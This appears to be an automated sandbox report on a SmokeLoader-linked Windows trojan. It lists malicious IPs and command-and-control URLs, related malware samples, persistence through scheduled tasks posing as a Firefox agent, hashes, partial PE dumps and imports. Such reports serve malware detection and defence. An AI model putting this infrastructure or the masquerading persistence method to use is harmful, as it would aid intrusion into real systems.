                                    https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppeexplorer.exe, 00000001.00000000.1731082031.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalseunknown
                                    https://www.msn.com/en-us/news/world/agostini-krausz-and-l-huillier-win-physics-nobel-for-looking-atexplorer.exe, 00000001.00000000.1731082031.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                      unknown
                                      https://www.msn.com/en-us/weather/topstories/rest-of-hurricane-season-in-uncharted-waters-because-ofexplorer.exe, 00000001.00000000.1731082031.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                        unknown
                                        • No. of IPs < 25%
                                        • 25% < No. of IPs < 50%
                                        • 50% < No. of IPs < 75%
                                        • 75% < No. of IPs
                                        IPDomainCountryFlagASNASN NameMalicious
                                        186.233.231.45
                                        unknownBrazil
                                        262675SolucaoNetworkProvedorLtdaBRtrue
                                        116.58.10.60
                                        nwgrus.ruPakistan
                                        17563NEXLINX-AS-APAutonomousSystemNumberforNexlinxPKtrue
                                        23.145.40.164
                                        unknownReserved
                                        22631SURFAIRWIRELESS-IN-01UStrue
                                        Joe Sandbox version:41.0.0 Charoite
                                        Analysis ID:1531374
                                        Start date and time:2024-10-11 06:36:07 +02:00
                                        Joe Sandbox product:CloudBasic
                                        Overall analysis duration:0h 9m 1s
                                        Hypervisor based Inspection enabled:false
                                        Report type:full
                                        Cookbook file name:default.jbs
                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                        Number of analysed new started processes analysed:10
                                        Number of new started drivers analysed:0
                                        Number of existing processes analysed:0
                                        Number of existing drivers analysed:0
                                        Number of injected processes analysed:1
                                        Technologies:
                                        • HCA enabled
                                        • EGA enabled
                                        • AMSI enabled
                                        Analysis Mode:default
                                        Analysis stop reason:Timeout
                                        Sample name:wBgwzVbZuV.exe
                                        renamed because original name is a hash value
                                        Original Sample Name:a50c051c3beb22a0f9ce8694fb4d0bab.exe
                                        Detection:MAL
                                        Classification:mal100.troj.evad.winEXE@7/4@26/3
                                        EGA Information:
                                        • Successful, ratio: 66.7%
                                        HCA Information:
                                        • Successful, ratio: 96%
                                        • Number of executed functions: 82
                                        • Number of non-executed functions: 22
                                        Cookbook Comments:
                                        • Found application associated with file extension: .exe
                                        • Override analysis time to 240000 for current running targets taking high CPU consumption
                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                        • Excluded IPs from analysis (whitelisted): 40.126.32.76, 40.126.32.136, 20.190.160.17, 20.190.160.22, 40.126.32.134, 40.126.32.133, 40.126.32.68, 20.190.160.14
                                        • Excluded domains from analysis (whitelisted): prdv4a.aadg.msidentity.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, login.live.com, www.tm.v4.a.prd.aadg.akadns.net, ctldl.windowsupdate.com, login.msa.msidentity.com, fe3cr.delivery.mp.microsoft.com, www.tm.lg.prod.aadmsa.trafficmanager.net
                                        • Execution Graph export aborted for target rghrbbi, PID 3900 because there are no executed function
                                        • Execution Graph export aborted for target wehrbbi, PID 3960 because there are no executed function
                                        • Not all processes where analyzed, report is missing behavior information
                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                        • Report size getting too big, too many NtEnumerateKey calls found.
                                        • Report size getting too big, too many NtOpenKey calls found.
                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                        TimeTypeDescription
                                        00:37:23API Interceptor417090x Sleep call for process: explorer.exe modified
                                        05:36:48Task SchedulerRun new task: {72BD172C-641F-4DB0-BE70-8EC3BE0A0B29} path:
                                        05:37:23Task SchedulerRun new task: Firefox Default Browser Agent 4FAE96DB80CD7C80 path: C:\Users\user\AppData\Roaming\wehrbbi
                                        05:38:26Task SchedulerRun new task: Firefox Default Browser Agent F88236F8CC5A85B4 path: C:\Users\user\AppData\Roaming\rghrbbi
                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        186.233.231.45bQ7r31F9Ow.exeGet hashmaliciousSmokeLoaderBrowse
                                        • nwgrus.ru/tmp/index.php
                                        file.exeGet hashmaliciousSmokeLoaderBrowse
                                        • nwgrus.ru/tmp/index.php
                                        3pl0GSzVPg.exeGet hashmaliciousSmokeLoaderBrowse
                                        • olihonols.in.net/tmp/
                                        116.58.10.60KTh1gQlT9a.exeGet hashmaliciousSmokeLoaderBrowse
                                        • nwgrus.ru/tmp/index.php
                                        7zaC3J8wBV.exeGet hashmaliciousLummaC, Go Injector, SmokeLoaderBrowse
                                        • 100xmargin.com/tmp/index.php
                                        uue9O7WXRA.exeGet hashmaliciousSmokeLoaderBrowse
                                        • gebeus.ru/tmp/index.php
                                        a6lzHWp4pa.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
                                        • bipto.org/tmp/index.php
                                        23.145.40.164bQ7r31F9Ow.exeGet hashmaliciousSmokeLoaderBrowse
                                          LbzlI5idGJ.exeGet hashmaliciousSmokeLoaderBrowse
                                            PGUs9p74si.exeGet hashmaliciousSmokeLoaderBrowse
                                              IpYWCeJMsb.exeGet hashmaliciousSmokeLoaderBrowse
                                                Wd7eNVLo7b.exeGet hashmaliciousSmokeLoaderBrowse
                                                  T1TmLXusl0.exeGet hashmaliciousSmokeLoaderBrowse
                                                    O4zPA1oI9Y.exeGet hashmaliciousSmokeLoaderBrowse
                                                      5zA3mXMdtG.exeGet hashmaliciousSmokeLoaderBrowse
                                                        Lk9rbSoFqa.exeGet hashmaliciousSmokeLoaderBrowse
                                                          ctMI3TYXpX.exeGet hashmaliciousSmokeLoaderBrowse
                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                            nwgrus.rubQ7r31F9Ow.exeGet hashmaliciousSmokeLoaderBrowse
                                                            • 190.147.2.86
                                                            LbzlI5idGJ.exeGet hashmaliciousSmokeLoaderBrowse
                                                            • 187.211.161.52
                                                            PGUs9p74si.exeGet hashmaliciousSmokeLoaderBrowse
                                                            • 92.36.226.66
                                                            IpYWCeJMsb.exeGet hashmaliciousSmokeLoaderBrowse
                                                            • 201.103.8.135
                                                            Wd7eNVLo7b.exeGet hashmaliciousSmokeLoaderBrowse
                                                            • 190.224.203.37
                                                            T1TmLXusl0.exeGet hashmaliciousSmokeLoaderBrowse
                                                            • 210.182.29.70
                                                            O4zPA1oI9Y.exeGet hashmaliciousSmokeLoaderBrowse
                                                            • 160.177.223.165
                                                            5zA3mXMdtG.exeGet hashmaliciousSmokeLoaderBrowse
                                                            • 181.52.122.51
                                                            Lk9rbSoFqa.exeGet hashmaliciousSmokeLoaderBrowse
                                                            • 63.143.98.185
                                                            ctMI3TYXpX.exeGet hashmaliciousSmokeLoaderBrowse
                                                            • 180.75.11.133
                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                            SolucaoNetworkProvedorLtdaBRbQ7r31F9Ow.exeGet hashmaliciousSmokeLoaderBrowse
                                                            • 186.233.231.45
                                                            file.exeGet hashmaliciousSmokeLoaderBrowse
                                                            • 186.233.231.45
                                                            3pl0GSzVPg.exeGet hashmaliciousSmokeLoaderBrowse
                                                            • 186.233.231.45
                                                            OBbrO5rwew.exeGet hashmaliciousLummaC, Poverty Stealer, SmokeLoaderBrowse
                                                            • 186.233.231.45
                                                            SecuriteInfo.com.Win32.DropperX-gen.32377.19302.exeGet hashmaliciousLummaC, Poverty Stealer, SmokeLoaderBrowse
                                                            • 186.233.231.45
                                                            NEXLINX-AS-APAutonomousSystemNumberforNexlinxPKKTh1gQlT9a.exeGet hashmaliciousSmokeLoaderBrowse
                                                            • 116.58.10.60
                                                            7zaC3J8wBV.exeGet hashmaliciousLummaC, Go Injector, SmokeLoaderBrowse
                                                            • 116.58.10.60
                                                            uue9O7WXRA.exeGet hashmaliciousSmokeLoaderBrowse
                                                            • 116.58.10.60
                                                            y7cm9CKSN9.elfGet hashmaliciousMiraiBrowse
                                                            • 116.58.43.103
                                                            yJgVAg26w0.elfGet hashmaliciousMiraiBrowse
                                                            • 116.58.43.106
                                                            7ZEAQv0SZ6.elfGet hashmaliciousMirai, MoobotBrowse
                                                            • 202.59.68.26
                                                            7048CflwYY.exeGet hashmaliciousLummaC, SmokeLoaderBrowse
                                                            • 116.58.10.59
                                                            a6lzHWp4pa.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
                                                            • 116.58.10.60
                                                            2.exeGet hashmaliciousSmokeLoaderBrowse
                                                            • 116.58.10.60
                                                            WFdAK6HQgz.elfGet hashmaliciousUnknownBrowse
                                                            • 202.59.68.69
                                                            SURFAIRWIRELESS-IN-01USbQ7r31F9Ow.exeGet hashmaliciousSmokeLoaderBrowse
                                                            • 23.145.40.164
                                                            LbzlI5idGJ.exeGet hashmaliciousSmokeLoaderBrowse
                                                            • 23.145.40.164
                                                            PGUs9p74si.exeGet hashmaliciousSmokeLoaderBrowse
                                                            • 23.145.40.164
                                                            IpYWCeJMsb.exeGet hashmaliciousSmokeLoaderBrowse
                                                            • 23.145.40.164
                                                            Wd7eNVLo7b.exeGet hashmaliciousSmokeLoaderBrowse
                                                            • 23.145.40.164
                                                            T1TmLXusl0.exeGet hashmaliciousSmokeLoaderBrowse
                                                            • 23.145.40.164
                                                            O4zPA1oI9Y.exeGet hashmaliciousSmokeLoaderBrowse
                                                            • 23.145.40.164
                                                            5zA3mXMdtG.exeGet hashmaliciousSmokeLoaderBrowse
                                                            • 23.145.40.164
                                                            Lk9rbSoFqa.exeGet hashmaliciousSmokeLoaderBrowse
                                                            • 23.145.40.164
                                                            ctMI3TYXpX.exeGet hashmaliciousSmokeLoaderBrowse
                                                            • 23.145.40.164
                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                            72a589da586844d7f0818ce684948eeabQ7r31F9Ow.exeGet hashmaliciousSmokeLoaderBrowse
                                                            • 23.145.40.164
                                                            LbzlI5idGJ.exeGet hashmaliciousSmokeLoaderBrowse
                                                            • 23.145.40.164
                                                            PGUs9p74si.exeGet hashmaliciousSmokeLoaderBrowse
                                                            • 23.145.40.164
                                                            IpYWCeJMsb.exeGet hashmaliciousSmokeLoaderBrowse
                                                            • 23.145.40.164
                                                            Wd7eNVLo7b.exeGet hashmaliciousSmokeLoaderBrowse
                                                            • 23.145.40.164
                                                            T1TmLXusl0.exeGet hashmaliciousSmokeLoaderBrowse
                                                            • 23.145.40.164
                                                            O4zPA1oI9Y.exeGet hashmaliciousSmokeLoaderBrowse
                                                            • 23.145.40.164
                                                            5zA3mXMdtG.exeGet hashmaliciousSmokeLoaderBrowse
                                                            • 23.145.40.164
                                                            Lk9rbSoFqa.exeGet hashmaliciousSmokeLoaderBrowse
                                                            • 23.145.40.164
                                                            ctMI3TYXpX.exeGet hashmaliciousSmokeLoaderBrowse
                                                            • 23.145.40.164
                                                            No context
                                                            Process:C:\Windows\explorer.exe
                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):244736
                                                            Entropy (8bit):5.848376152028521
                                                            Encrypted:false
                                                            SSDEEP:3072:adlDxJIN48blqsUwqPftttHBgqXmSHO5GXo7RZ9kwPRZyq+AZ/XR:aPQFblq88ttBmymrbkwpdH
                                                            MD5:500B5F7BBE44E1C2370628C67AC45F67
                                                            SHA1:47BD69068462630444A4E5C022254A2D3C7DCDDE
                                                            SHA-256:4B8612E3D76F13CA83695A83B123734D35C0F4D75459BCE40596F37579E0B747
                                                            SHA-512:54C9E23E2709FB33C4444EC3DD98B946A223D95CF6C192A1136B5CB6BCA7AFC2DB1437FAA6E9B9D74397C1F25DBDC0431F3F9618237EA97C888CC99F769F7C62
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                            Reputation:low
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............o..o..o..=..o..=..o..=...o....o..o...o..=..o..=..o..=..o..Rich.o..........................PE..L....".d.................L....r..............`....@...........................s......W......................................$w..<.....r..............................................................................`...............................text....K.......L.................. ..`.rdata.......`... ...P..............@..@.data...|.o..........p..............@....tuje....D....q..8..................@....wekigof.(....q..(..................@....rsrc.........r.....................@..@................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\explorer.exe
                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                            Category:modified
                                                            Size (bytes):244736
                                                            Entropy (8bit):5.848376152028521
                                                            Encrypted:false
                                                            SSDEEP:3072:adlDxJIN48blqsUwqPftttHBgqXmSHO5GXo7RZ9kwPRZyq+AZ/XR:aPQFblq88ttBmymrbkwpdH
                                                            MD5:500B5F7BBE44E1C2370628C67AC45F67
                                                            SHA1:47BD69068462630444A4E5C022254A2D3C7DCDDE
                                                            SHA-256:4B8612E3D76F13CA83695A83B123734D35C0F4D75459BCE40596F37579E0B747
                                                            SHA-512:54C9E23E2709FB33C4444EC3DD98B946A223D95CF6C192A1136B5CB6BCA7AFC2DB1437FAA6E9B9D74397C1F25DBDC0431F3F9618237EA97C888CC99F769F7C62
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                            Reputation:low
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............o..o..o..=..o..=..o..=...o....o..o...o..=..o..=..o..=..o..Rich.o..........................PE..L....".d.................L....r..............`....@...........................s......W......................................$w..<.....r..............................................................................`...............................text....K.......L.................. ..`.rdata.......`... ...P..............@..@.data...|.o..........p..............@....tuje....D....q..8..................@....wekigof.(....q..(..................@....rsrc.........r.....................@..@................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\explorer.exe
                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):245760
                                                            Entropy (8bit):5.866867167050139
                                                            Encrypted:false
                                                            SSDEEP:3072:NI34v/yndPSaFnG1uHO5nXo9WjlkwZWjKq+AZ/XR:C3qKpTFdWBkwZWLH
                                                            MD5:A50C051C3BEB22A0F9CE8694FB4D0BAB
                                                            SHA1:40F81C46DF2C9DA0157BC9A9270C9A171DB284C9
                                                            SHA-256:1C17F70CFD875C4780045BF42E6FA42C98A23B51E7869774F6C388DDE6C50F77
                                                            SHA-512:210FB400950F920F7939D48A965C389E61FA2B01D480EEB241D0E4E38039FC1835D198FBCC496B62E7223703F595A46D350396EFDB46E6338181B14C6D172B57
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                            • Antivirus: ReversingLabs, Detection: 42%
                                                            Reputation:low
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............o..o..o..=..o..=..o..=...o....o..o...o..=..o..=..o..=..o..Rich.o..........................PE..L.....d.................P....r..............`....@...........................s.............................................$w..<.....r..............................................................................`...............................text....O.......P.................. ..`.rdata.......`... ...T..............@..@.data...|.o..........t..............@....dejunug.D....q..8..................@....manu....(....q..(..................@....rsrc.........r.....................@..@................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\explorer.exe
                                                            File Type:ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):26
                                                            Entropy (8bit):3.95006375643621
                                                            Encrypted:false
                                                            SSDEEP:3:ggPYV:rPYV
                                                            MD5:187F488E27DB4AF347237FE461A079AD
                                                            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                            Malicious:true
                                                            Reputation:high, very likely benign file
                                                            Preview:[ZoneTransfer]....ZoneId=0
                                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                            Entropy (8bit):5.866867167050139
                                                            TrID:
                                                            • Win32 Executable (generic) a (10002005/4) 99.96%
                                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                                            • DOS Executable Generic (2002/1) 0.02%
                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                            File name:wBgwzVbZuV.exe
                                                            File size:245'760 bytes
                                                            MD5:a50c051c3beb22a0f9ce8694fb4d0bab
                                                            SHA1:40f81c46df2c9da0157bc9a9270c9a171db284c9
                                                            SHA256:1c17f70cfd875c4780045bf42e6fa42c98a23b51e7869774f6c388dde6c50f77
                                                            SHA512:210fb400950f920f7939d48a965c389e61fa2b01d480eeb241d0e4e38039fc1835d198fbcc496b62e7223703f595a46d350396efdb46e6338181b14c6d172b57
                                                            SSDEEP:3072:NI34v/yndPSaFnG1uHO5nXo9WjlkwZWjKq+AZ/XR:C3qKpTFdWBkwZWLH
                                                            TLSH:DB344B5176F2A056FBB7C975BD79D694193BFCE2AA70817E11002A3F1871EB08D42B23
                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............o...o...o...=...o...=...o...=...o.......o...o...o...=...o...=...o...=...o..Rich.o..........................PE..L......d...
                                                            Icon Hash:17694cb2b24d2117
                                                            Entrypoint:0x4013be
                                                            Entrypoint Section:.text
                                                            Digitally signed:false
                                                            Imagebase:0x400000
                                                            Subsystem:windows gui
                                                            Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                            DLL Characteristics:TERMINAL_SERVER_AWARE
                                                            Time Stamp:0x648F94DA [Sun Jun 18 23:35:54 2023 UTC]
                                                            TLS Callbacks:
                                                            CLR (.Net) Version:
                                                            OS Version Major:5
                                                            OS Version Minor:0
                                                            File Version Major:5
                                                            File Version Minor:0
                                                            Subsystem Version Major:5
                                                            Subsystem Version Minor:0
                                                            Import Hash:a1500beb43e4667491e27fdba1510118
                                                            Instruction
                                                            call 00007F02B0DCCBD7h
                                                            jmp 00007F02B0DCA24Dh
                                                            mov edi, edi
                                                            push ebp
                                                            mov ebp, esp
                                                            sub esp, 00000328h
                                                            mov dword ptr [00419398h], eax
                                                            mov dword ptr [00419394h], ecx
                                                            mov dword ptr [00419390h], edx
                                                            mov dword ptr [0041938Ch], ebx
                                                            mov dword ptr [00419388h], esi
                                                            mov dword ptr [00419384h], edi
                                                            mov word ptr [004193B0h], ss
                                                            mov word ptr [004193A4h], cs
                                                            mov word ptr [00419380h], ds
                                                            mov word ptr [0041937Ch], es
                                                            mov word ptr [00419378h], fs
                                                            mov word ptr [00419374h], gs
                                                            pushfd
                                                            pop dword ptr [004193A8h]
                                                            mov eax, dword ptr [ebp+00h]
                                                            mov dword ptr [0041939Ch], eax
                                                            mov eax, dword ptr [ebp+04h]
                                                            mov dword ptr [004193A0h], eax
                                                            lea eax, dword ptr [ebp+08h]
                                                            mov dword ptr [004193ACh], eax
                                                            mov eax, dword ptr [ebp-00000320h]
                                                            mov dword ptr [004192E8h], 00010001h
                                                            mov eax, dword ptr [004193A0h]
                                                            mov dword ptr [0041929Ch], eax
                                                            mov dword ptr [00419290h], C0000409h
                                                            mov dword ptr [00419294h], 00000001h
                                                            mov eax, dword ptr [00418004h]
                                                            mov dword ptr [ebp-00000328h], eax
                                                            mov eax, dword ptr [00418008h]
                                                            mov dword ptr [ebp-00000324h], eax
                                                            call dword ptr [000000D4h]
                                                            Programming Language:
                                                            • [C++] VS2008 build 21022
                                                            • [ASM] VS2008 build 21022
                                                            • [ C ] VS2008 build 21022
                                                            • [IMP] VS2005 build 50727
                                                            • [RES] VS2008 build 21022
                                                            • [LNK] VS2008 build 21022
                                                            NameVirtual AddressVirtual Size Is in Section
                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x177240x3c.rdata
                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x27200000x1d608.rsrc
                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_IAT0x160000x180.rdata
                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                            .text0x10000x14f0f0x150000c523c8646db8fd22104634c76e0b06aFalse0.824462890625data7.553501827115452IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                            .rdata0x160000x1ff40x200073751f9de0172c9e60ba622bae4c7c41False0.3790283203125data5.614633243205824IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                            .data0x180000x26fff7c0x14004de33ba2bb06ca9e60a919999ceceda2unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                            .dejunug0x27180000x44000x3800b211778b80f6d441b6cf61ada776fc6dFalse0.0025809151785714285data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                            .manu0x271d0000x28000x28001276481102f218c981e0324180bafd9fFalse0.00322265625data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                            .rsrc0x27200000x1d6080x1d800ccd30d640483e3f7f9698db2726859e9False0.4614671610169492data5.061501595959506IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                                            RT_ICON0x27209a00xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsTurkishTurkey0.5676972281449894
                                                            RT_ICON0x27218480x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsTurkishTurkey0.6425992779783394
                                                            RT_ICON0x27220f00x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsTurkishTurkey0.6918202764976958
                                                            RT_ICON0x27227b80x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsTurkishTurkey0.7492774566473989
                                                            RT_ICON0x2722d200x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216TurkishTurkey0.516597510373444
                                                            RT_ICON0x27252c80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096TurkishTurkey0.6184333958724203
                                                            RT_ICON0x27263700x988Device independent bitmap graphic, 24 x 48 x 32, image size 2304TurkishTurkey0.6221311475409836
                                                            RT_ICON0x2726cf80x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024TurkishTurkey0.7650709219858156
                                                            RT_ICON0x27271d80xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsTurkishTurkey0.40031982942430705
                                                            RT_ICON0x27280800x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsTurkishTurkey0.5018050541516246
                                                            RT_ICON0x27289280x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsTurkishTurkey0.5230414746543779
                                                            RT_ICON0x2728ff00x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsTurkishTurkey0.5563583815028902
                                                            RT_ICON0x27295580x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600TurkishTurkey0.3496887966804979
                                                            RT_ICON0x272bb000x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224TurkishTurkey0.37429643527204504
                                                            RT_ICON0x272cba80x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400TurkishTurkey0.39877049180327867
                                                            RT_ICON0x272d5300x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088TurkishTurkey0.41312056737588654
                                                            RT_ICON0x272da100xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0TurkishTurkey0.39445628997867804
                                                            RT_ICON0x272e8b80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0TurkishTurkey0.5573104693140795
                                                            RT_ICON0x272f1600x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0TurkishTurkey0.6203917050691244
                                                            RT_ICON0x272f8280x568Device independent bitmap graphic, 16 x 32 x 8, image size 0TurkishTurkey0.6358381502890174
                                                            RT_ICON0x272fd900x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0TurkishTurkey0.43198874296435275
                                                            RT_ICON0x2730e380x988Device independent bitmap graphic, 24 x 48 x 32, image size 0TurkishTurkey0.4278688524590164
                                                            RT_ICON0x27317c00x468Device independent bitmap graphic, 16 x 32 x 32, image size 0TurkishTurkey0.47074468085106386
                                                            RT_ICON0x2731c900xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsTurkishTurkey0.40031982942430705
                                                            RT_ICON0x2732b380x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsTurkishTurkey0.5018050541516246
                                                            RT_ICON0x27333e00x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsTurkishTurkey0.5230414746543779
                                                            RT_ICON0x2733aa80x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsTurkishTurkey0.5563583815028902
                                                            RT_ICON0x27340100x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600TurkishTurkey0.3496887966804979
                                                            RT_ICON0x27365b80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224TurkishTurkey0.37429643527204504
                                                            RT_ICON0x27376600x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400TurkishTurkey0.39877049180327867
                                                            RT_ICON0x2737fe80x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088TurkishTurkey0.41312056737588654
                                                            RT_STRING0x27386800x370data0.4693181818181818
                                                            RT_STRING0x27389f00x63edata0.43679599499374216
                                                            RT_STRING0x27390300x55edata0.44759825327510916
                                                            RT_STRING0x27395900x764data0.4275898520084567
                                                            RT_STRING0x2739cf80x698data0.4277251184834123
                                                            RT_STRING0x273a3900x906data0.41255411255411256
                                                            RT_STRING0x273ac980x746data0.42910848549946295
                                                            RT_STRING0x273b3e00x71adata0.4218921892189219
                                                            RT_STRING0x273bb000x8fadata0.4112271540469974
                                                            RT_STRING0x273c4000x524data0.4566869300911854
                                                            RT_STRING0x273c9280x7a8data0.42857142857142855
                                                            RT_STRING0x273d0d00x464data0.44483985765124556
                                                            RT_STRING0x273d5380xcedata0.558252427184466
                                                            RT_GROUP_ICON0x272d9980x76dataTurkishTurkey0.6694915254237288
                                                            RT_GROUP_ICON0x27384500x76dataTurkishTurkey0.6694915254237288
                                                            RT_GROUP_ICON0x27271600x76dataTurkishTurkey0.6610169491525424
                                                            RT_GROUP_ICON0x2731c280x68dataTurkishTurkey0.7211538461538461
                                                            RT_VERSION0x27384c80x1b8COM executable for DOS0.5886363636363636
                                                            DLLImport
                                                            KERNEL32.dllGetNumaProcessorNode, GetConsoleAliasExesLengthA, WriteConsoleOutputCharacterA, DeleteVolumeMountPointA, OpenJobObjectA, InterlockedDecrement, InterlockedCompareExchange, GetComputerNameW, SetEvent, FreeEnvironmentStringsA, GetModuleHandleW, ReadConsoleW, SetCommState, GetConsoleMode, ReadConsoleOutputW, GetSystemTimeAdjustment, GetVersionExW, GetStringTypeExW, HeapDestroy, GetFileAttributesA, GetTimeFormatW, GetBinaryTypeA, GetConsoleAliasesLengthW, DisconnectNamedPipe, GetLastError, GetProcAddress, MoveFileW, SetStdHandle, SearchPathA, LoadLibraryA, LocalAlloc, SetCalendarInfoW, WritePrivateProfileStringA, QueryDosDeviceW, GetModuleFileNameA, GetDefaultCommConfigA, GetModuleHandleA, BuildCommDCBA, FatalAppExitA, GetShortPathNameW, FindAtomW, GlobalReAlloc, PulseEvent, HeapFree, HeapAlloc, GetCommandLineA, GetStartupInfoA, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, HeapCreate, VirtualFree, DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, VirtualAlloc, HeapReAlloc, Sleep, ExitProcess, WriteFile, GetStdHandle, GetEnvironmentStrings, FreeEnvironmentStringsW, WideCharToMultiByte, GetEnvironmentStringsW, SetHandleCount, GetFileType, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, InterlockedIncrement, SetLastError, GetCurrentThreadId, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, InitializeCriticalSectionAndSpinCount, RtlUnwind, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, HeapSize, GetLocaleInfoA, LCMapStringA, MultiByteToWideChar, LCMapStringW, GetStringTypeA, GetStringTypeW
